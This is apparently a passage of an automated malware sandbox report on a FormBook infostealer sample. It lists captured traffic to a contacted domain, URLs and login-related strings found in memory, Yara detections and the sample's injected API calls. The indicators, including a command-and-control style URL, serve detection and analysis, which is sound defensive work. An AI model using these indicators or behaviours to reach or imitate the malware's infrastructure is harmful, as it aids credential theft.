                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:43 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:46 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrbAJGBPqSekiNFNlLHlkWggZwRIBoCZeboYSGLKT88GqdIjBLj%2FtoG0oehOD2Hr%2BwCtriyKTCpNk2kTYGYqwJl4YFKnBBfY6aAe2pugIwxlTEwg7WsA7rLiYXnQl1nJ2rpoRfTjj9w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb557eba0426a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncRbJFQ0QFw%2BWH%2BDc0YIPq1OEGnzWQe%2BG%2BfsfdF57MPZpn6DMs81OjFhSkXissxUlPxwmIZIq%2FHuwb%2BQ9vyeVe4PTmssyDbl49YxPRY9Z2wb0PTfNw4uMpv6BA%2FBGVsr%2BBalXs7PsfY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb5689e41f78f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klTNJjBKBRcyfJIazy2jYLVA0hRfmQr4XFeXLNL%2FP2eSQRU9lEJID8mbAMkExn3sZ71P%2FfDl3RsR1bjUcyxVKV%2FniUxWWLu5KGQBt5ae4r3V73kgWWqi1ml%2BOGhqUJNQB3oX9zj4a%2F4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb5798d5fef9f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=29696&min_rtt=29696&rtt_var=14848&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUKvpOayw%2FbaN0zwn70sunYJryCSswQyyAn3CKPqEpaf3Tjq7Iupbufkoy1HRwY8rJM60Vi4bseWikiCm6QPe1uPnUS0QDp0pR0uo%2BiZsXAgHAzolQ%2FlbCHY50gpkaRj1YnVU%2BjYoKk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb589f82842da-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:08 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: regini.exe, 00000006.00000002.4819056247.0000000005010000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000046F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop/qimy/
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                Source: regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000006.00000003.2950852511.000000000792A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004CEC000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000043CC000.00000004.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.000000000423A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C903 NtClose,2_2_0042C903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
